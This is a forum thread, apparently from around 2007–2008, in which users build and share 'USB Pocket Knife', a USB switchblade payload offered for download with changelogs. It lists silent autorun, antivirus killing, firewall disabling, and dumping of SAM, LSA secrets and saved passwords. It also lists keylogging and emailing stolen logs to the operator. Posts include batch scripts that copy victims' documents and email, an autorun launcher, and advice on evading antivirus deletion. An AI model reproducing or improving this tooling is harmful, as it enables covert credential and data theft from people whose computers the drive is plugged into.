Leapo Posted June 16, 2007 Share Posted June 16, 2007 Introduction: Let me start off by saying that this is NOT YET a final payload, this threads purpose is to serve as a learning experience to me while providing a useful end-all be-all payload to the community. For now I will provide the payload in its current state at the end of this post. This payload is the result of slowly browsing this forum and saving every bit of code and every full payload I've come across, then stitching it all together into a modular switchblade with just about every feature in existence. I've gone through and fully commented most of the code (still working on that), I've made sure everything is virus free, I've separated out major functions so that they can be turned on and off at will, and I've made sure it runs completely silently on a U3 and non-U3 thumbdrive in the least-obvious way possible.Current State and Features: The following is a list of everything included in the payload:Key: - Non-U3 Drives Only - U3 Drives only - Not yet Implemented - Everything ElseFeatures: - Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive. - Full silent autorun with no user interaction for U3 drives. - A "Menu.bat" is included to mange all special functions, modules, and features of the switchblade. - Payload checks the root of the C: drive and prevents the payload from running if the file "Safety.txt" is found. - Includes TightVNC viewer so you always have it with you. - Includes Notepad++ for easy batch editing. - Includes antidote batch files for Nmap, the Hacksaw, and VNC. - Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs. - A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it's been nuked by an antivirus. - A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives. - Auto Compress logs as they are generated to save space - Email logs Back to yourself - Optional auto-repack of executable to circumvent AV detectionPayload Components: - Runs AVKill (csrss.exe) - Restores the payload to the last backup point - Disables the Windows Firewall Silently - Hides Hidden and System Files - Enables the Remote Desktop service - Dumps general System Info - Dumps the SAM - Dumps LSA secrets - Dumps LSA secrets via an alternate method (less detectable, not as pretty) - Dumps Network Passwords - Dump messenger passwords - Dump IE passwords. - Dump saved wireless keys - Dump URL history - Dump Firefox passwords (Supports Firefox 3)) - Dump Cache Passwords - Dump Current Network Services - Generic Port Scanning - Dumps current external IP - Dumps email, messenger, and general website passwords - Dumps currently installed hot fixes and IE history - Dumps Google Chrome passwords - Installs Hacksaw the usual way - Installs WinVNC client. - Installs Nmap as a service (emails you results like the Hacksaw) - Installs a keylogger which emails its logs off to you daily [broken!] - File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files) - File slurping for various Documents and Media folders. (larger files) - Opens an explorer window to the Documents folder when finished - Automatic update scrip to keep various executables up to date. - Compress logs as they are generated to save space. - Optionally email logs in addition to storing them on the switchblade. - Management interface to manage the various functions of the pocket Knife. - Ability to save up to 3 configuration profiles [New!] Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 16, 2007 Author Share Posted June 16, 2007 Modules In Development: Please Stand By Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 16, 2007 Author Share Posted June 16, 2007 Known Bugs: Keylogger is currently non-functional Payload may cause No Disk errors on systems with card readers (will be fixed in next version) Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 16, 2007 Author Share Posted June 16, 2007 Download Payload: Here' s where you'll find the most recent full build of my payload; I'll try to keep this as up-to-date as I can as I receive and work out fixes and optimizations. I'll always post a notification when a new version is available, or when an update is made to the code in my above posts.Current Version: USB Pocket Knife 0.8.8.0 by LeapoRelease Date: October 6, 2008Download Mirrors: MegaUpload, and RapidShare Note: The above includes both the U3 and non-U3 versions of the payload. The ISO is now pre-built, just flash and go!!!Payload Change Log: October 6, 2008: Pocketknife 0.8.8.0 Released Change 0: Payload can now be set to shutdown the PC after its finished. Change 1: Now dumps Google Chrome passwords. Change 2: New profile management system, save up to 3 payload configurations! Change 3: If "Safety.txt Check" is disabled Menu.bat will now show the "run payload" option even if Safety.txt is found. Change 4: made some cosmetic fixes to Menu.bat.September 28, 2008: Pocketknife 0.8.7.0 Released Change 0: Backup Script in menu.bat works again. Change 1: Auto-Update script in menu.bat works again. Change 2: Many path errors fixed. Change 3: Added OS detection to increase compatibility. Change 4: Slurp now uses variables instead of hard paths to improve compatibility. Change 5: Slurp now grabs data from Pidgen. Change 6: Prebuilt U3 ISO included!September 19, 2008: Pocketknife 0.8.6.5 Released Change 0: Invalid directory name broke just about all of 0.8.6.0, this has been corrected. Change 1: AVKill's executable was missing from the U3 version of the payload. Change 2: File Copiers executable was missing entirely. September 15, 2008: Pocketknife 0.8.6.0 Released Change 0: Fixed U3 compatibility (was broken in 0.8.5.5) Change 1: Slurp 2 should now work properly.September 17, 2008: Pocketknife 0.8.5.5 Released Change 0: Fixed "Port Scan" not running correctly. Change 1: PwDump failing to create service. Change 2: FgDump failing to output anything. Change 3: Firepassword updated, now works with Firefox 3.0 Change 4: PwDump Updated to 1.7.2 Change 5: FgDump updated to 2.1.0September 14, 2008: Pocketknife 0.8.5.0 Released Change 0: Animation_1.cfg was missing, causing some features of menu.bat to malfunction. Change 1: Fixed an ordering issue in Start.bat. Change 2: Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat Change 3: Fixed a typo preventing the "Dump Mail Passwords" module from running. Change 4: Fixed a typo preventing the "Dump Updates-List" module from running. Change 5: Fixed "Dump Mail passwords" not running correctly. Change 6: Fixed "Dump Network passwords" not running correctly. Change 7: Fixed "Dump Messenger passwords" not running correctly. Change 8: Fixed "Dump LSA Secrets" not running correctly. Change 9: AVKill Should now operate silently. Change 10: File structure created by slurp was cleaned up. Change 11: Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).September 11, 2008: Pocketknife 0.8.2.0 Released Change 0: Bug causing safety.txt to be ignored fixed. Change 1: "No Disk" errors should be resolved. Change 2: New "disarm' feature to prevent it from starting at all. Change 3: three options on what folder to open after completion: Logs, Root, or None. Change 4: ReadMe brought up to date. Change 5: "Disable Firewall" is now totally silent (disables security center first)August 31, 2008: Pre-Release 0.8.1.0 Released Change 0: Now fully U3 compatible (fixed from v0.8.0.0) Change 1: Menu.bat has been greatly reduced in size.June 09, 2008: Pre-Release 0.8.0.0 Released Change 0: Payload overhauled from the ground up. Change 1: Now fully U3 compatible (broken in this build). Change 2: Menu system overhauled. Change 3: Both versions of the payload launch silently for sure!November 24, 2007: U3 ISO Change 0: Fixed the U3 ISO to launch the payload silentlyNovember 10, 2007: Beta 0.6.2.1 Release Change 0: VNC install method updated. Change 1: Backup and Restore Script streamlined. Change 2: Automatic Updates added. Change 3: Centralized Management Interface added.June 20, 2007: Beta 0.4 Release Change 0: Added a custom backup and restore script (restores the payload before every run to keep it safe from AV software). Change 1: Updated the Readme with new information about the backup and restore function, PLEASE READ THE README! Change 2: Improved and added more comments to the code. Change 3: Fixed various typos in my comments.June 18, 2007: Beta 0.3 Release Change 0: Completely overhauled Slurp and Slurp2.bat Change 1: Fixed Port_Scan.bat (thanks go to Elmer and GonZor for their help). Change 2: Improved and added more comments to the code. Change 3: Fixed various typos in my comments.June 16, 2007: Initial Post Change 0: Initial Release Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 16, 2007 Author Share Posted June 16, 2007 Reserved for future use by OP due to character limits... Quote Link to comment Share on other sites More sharing options...
elmer Posted June 16, 2007 Share Posted June 16, 2007 Holy USB Hacks, Batman! This is cool. I can't wait to download it. How long did it take you to make this? Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 16, 2007 Share Posted June 16, 2007 a shit ton of potential here, cant wait to see the outcome... Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 16, 2007 Author Share Posted June 16, 2007 Download link posted, have at it! Any fixes you guys come up with I'll add to the payload, let's see if we can make this "the one". As for how long I've been working on it...well, I've been slowly building it since the original hacksaw came out. (not bad for my 10th through 14th posts ) I'll keep hammering away on my end, I really want to change the slurp.bat and slurp2.bat files over to FileCopy (FC.exe) instead of xCopy to remove the need to make a new xCopy command for every file extension you want to slurp. I'll probably have it all fixed by tonight, but feel free to use the current incarnation of Slurp, it just isn't quite as efficient as the new version will be. Quote Link to comment Share on other sites More sharing options...
elmer Posted June 16, 2007 Share Posted June 16, 2007 I'm downloading it right now. I am going to read it all, then post any fixes I have. Oh, if you need more mirrors, I put this on MegaUpload, FileSend, Deposit Files, FlyUpload, and Badongo (I really don't want this to get lost, like hackblade.rar). Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 16, 2007 Author Share Posted June 16, 2007 Holy cow elmer, thanks! You got those mirrors up darn quick! I'm going to go ahead and add those mirrors to the main download post. Quote Link to comment Share on other sites More sharing options...
MacMike Posted June 16, 2007 Share Posted June 16, 2007 Works Great, Thanks. . . But the Hacksaw won't work :( I tried it on different computers but it didn't work 1 Time it did with some other payloader. But the same loader on another comp didn't work anymore. . . . . . . Quote Link to comment Share on other sites More sharing options...
elmer Posted June 16, 2007 Share Posted June 16, 2007 I am going to try and make this U3 compatible. EDIT: Just fixed the port scan (I think). The new code is: Echo ************************************ > %~d0Documentslogfiles%computername%Port_Scan.log 2>&1 echo ************[Port Scan]************* >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1 Echo ************************************ >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1 portqry -local -l %~d0Documentslogfiles%computername%%computername%_ports.txt>>nul type %~d0Documentslogfiles%computername%%computername%_ports.txt >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1 del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt You will have to uncomment it in start.bat to make it work. Also, I like the safety thing. Pretty neat. Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 17, 2007 Author Share Posted June 17, 2007 @ MakMike: That's strange, considering I use the same method of launching the hacksaw that's employed on U3 distributions of the Hacksaw. I downloaded the original U3 hacksaw (the same one used on the show), copied the thumbdrive portion directly over to my payload, then I pulled the vb script they used to start the switchblade from the CD partition, decoded it, and modified it to work from the WIPCMD folder. In other words, if the original "as-seen-on-tv" hacksaw works, so should my hacksaw, because all that was changed was a path or two. Are you sure you edited send.bat correctly? If you don't enter the information exactly right, it'll just silently fail to send. Also, make sure you're using a Gmail password that contains NO SPACES; passwords with spaces aren't properly supported (everything after the first space is ignored). @ elmer: Thanks for the fix, I'll test it out a little and add it to the payload, along with my new versions of Slurp and Slurp2.bat...after I compare it to my busted code to see what you had to change to fix it XD Quote Link to comment Share on other sites More sharing options...
elmer Posted June 17, 2007 Share Posted June 17, 2007 I forgot how to copy multiple files/file types with fc.exe, so tell me if you know how. I checked in the /? (fc.exe /?) and it didn't say anything about it. I PM'd Obi-Wahn, but he hasn't gotten back to me yet. EDIT: You should try to get on Hak5Live RC1.5. The RC1 had some community stuff in it, and some air time couldn't hurt. Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 17, 2007 Author Share Posted June 17, 2007 Well, bad news elmer, I'm getting no output from the code you posted. It looks like the batch file isn't finding the executable (PortQry.exe) that's sitting in the folder with it. The "CD" command I had in there before fixed this issue, but it broke other batch files when run in succession... Edit: Getting fc.exe to copy multiple files of multiple types is pretty darn easy compared to xCopy. The example code below will copy everything from the ".TestCopy From" folder to the ".TestCopy To" folder (this includes sub folders and anything located within them) fc.exe ".TestCopy From*" ".TestCopy To*" /i /o So for example, here's what Slurp2.bat (used for copying the entire contents of the My Documents folder and Desktop) looks like using xCopy: :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments mkdir ....Documentslogfiles%computername%Slurp_DataMyMusic mkdir ....Documentslogfiles%computername%Slurp_DataMyVideos mkdir ....Documentslogfiles%computername%Slurp_DataMyPictures xcopy "C:Documents and Settings%username%My Documents*.doc" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.docx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.rtf" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.txt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.xls" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.csv" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ppt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.pptx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mdb" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.png" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.bmp" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.gif" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.htm" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.html" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.eml" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.msg" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.zip" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.rar" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.7z" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.psd" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wma" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wav" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mp3" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ogg" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mpg" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.avi" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wmv" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop xcopy "C:Documents and Settings%username%Desktop*.doc" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.rtf" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.txt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.xls" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.csv" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.ppt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.mdb" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.jpg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.gif" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.htm" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.eml" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.msg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h And here's what it looks like using FileCopier (fc.exe): :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o many thanks to Obi-Wahn for making such a helpful application! Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 17, 2007 Share Posted June 17, 2007 Hey I haven't downloaded your payload yet to test but I noticed this line in your code for the scan copy Documentslogfiles%computername%Port_Scan.log+Documentslogfiles%computername%%computername%_ports.log >>nul the syntax for copy is COPY <file1>+<file2> <dest> you'll notice you don't have a destination you just move the data to NUL put your destination in and it should work fine. If it isn't finding "PortQry.exe" call th file like so ".PortQry.exe" this will look for the file in where the batch file is located. By the way I think Ill have to challenge you for the the title of this payload being "the one", sorry. Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 17, 2007 Author Share Posted June 17, 2007 Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure what was had going on there). As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 17, 2007 Share Posted June 17, 2007 Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure what was had going on there). As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D No problem, It is possible for my payload to run on any drive actually :-P I my completely bias opinion I'd say the best thing about my payload is the fact it is customizable from a gui, no more editing code but considering both our payloads are still in development we will have to wait to see who's will be better, or we could put them together to create "the ULTIMATE one"? maybe. Anyway if you need help let me know. Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 17, 2007 Share Posted June 17, 2007 holy hell this is badass, i cant wait for the u3 version, this is great Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 18, 2007 Author Share Posted June 18, 2007 First things first, a new version has been released! Major highlights for this release include completely overhauled versions of Slurp and Slurp2.bat (now renamed fc_slurp and fc_slurp2.bat), a fixed version of Port_Scan.bat (thanks go to Elmer and GonZor for their help), and improvements to my code comments such as typo fixes and additional information. So, version 0.3 is now up the download link is in the usual place (in the 4th post of the thread, along with a change log)... Or if you're all too lazy to scroll up to my original posts, here are the links for Rapidshare and MegaUpload. @ Elmer and GonZor: Thanks for the help with this pesky module, it took a little more tweaking to get Port_Scan.bat to work properly, but I finally managed to get it to play nice with the other modules. It might be a tad unconventional, but at least it works: mkdir ....Documentslogfiles%computername% Echo ************************************ > ....Documentslogfiles%computername%Port_Scan.log 2>&1 echo ************[Port Scan]************* >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 .portqry -local -l ....Documentslogfiles%computername%%computername%_ports.txt>>nul type ....Documentslogfiles%computername%%computername%_ports.txt >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt @ GonZor: Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules). @ Elmer: You mentioned something about attempting to make my payload U3 compatible; if that works out, and I converted over the modules from GonZor's payload that I don't have, the only thing his current payload would have over mine is that it runs completely off of the CD partition of the U3 drive. If there's a way to keep the non-U3 portion of a flash drive safe from being nuked by Antivirus software, this might just be the way to go. Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 18, 2007 Share Posted June 18, 2007 I have spent a long time trying to find a way to protect the non u3 side from AV software and I couldnt find anything, but I agree if you could simply protect them on the non u3 side it would be simpler. The Av Nuking is the only reason I dont use ur payload on a day to day basis. Once again I would like to say keep up the outstanding work. Quote Link to comment Share on other sites More sharing options...
Leapo Posted June 18, 2007 Author Share Posted June 18, 2007 I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive? If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade. True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run... WOW, I think I might have something there!! :shock: Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 18, 2007 Share Posted June 18, 2007 @ GonZor: Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules). Yes my code is much cleaner and readable because i have written my code from scratch and not just ripped the code from the wiki (sorry had to say it). Basically my payload will include all of your functions as well eventually but be much easier to customize. I have spent a long time trying to find a way to protect the non u3 side from AV software and I couldnt find anything, but I agree if you could simply protect them on the non u3 side it would be simpler. The Av Nuking is the only reason I dont use ur payload on a day to day basis. Once again I would like to say keep up the outstanding work. I am working on a possible solution to this problem. I'll get back to you on this. I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive? If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade. True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run... WOW, I think I might have something there!! :shock: You posted while I was writing, yes this may be possible but it may also delete the Archive while it is being accessed. to solve that you may need to copy the encrypted volume before extracting. that way you never extract from the original volume and it will stay intact. You could try this with true crypt (good encryption, easy to use via command line) but you may not always have access to extract. Quote Link to comment Share on other sites More sharing options...
elmer Posted June 18, 2007 Share Posted June 18, 2007 I know how to get it U3 compatible. Here we go! I really hope this works [AutoRun] open=start.bat @echo off @start /min for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do %%i:Manual_Scan.bat @exit I will try to upload the U3CUSTOM.ISO when I can. Re: New version I have mirrors! DepositFiles, FileSend, ZUpload, and Badongo. Re: Protection from AV I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive? Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using Truecrypt with the switchblade. EDIT: Fixed the code (from %i to %%i) Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 18, 2007 Share Posted June 18, 2007 Re: Protection from AV I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive? Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using Truecrypt with the switchblade. Yes its actually very simple to do, although the problem is true crypt doesn't always work. then again i guess if you don't have permissions to use true crypt the logs generated wouldn't be much use. Once again It would be a valid idea to copy the volume and never extract from the original volume, AV's can decimate a volume if you can access it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.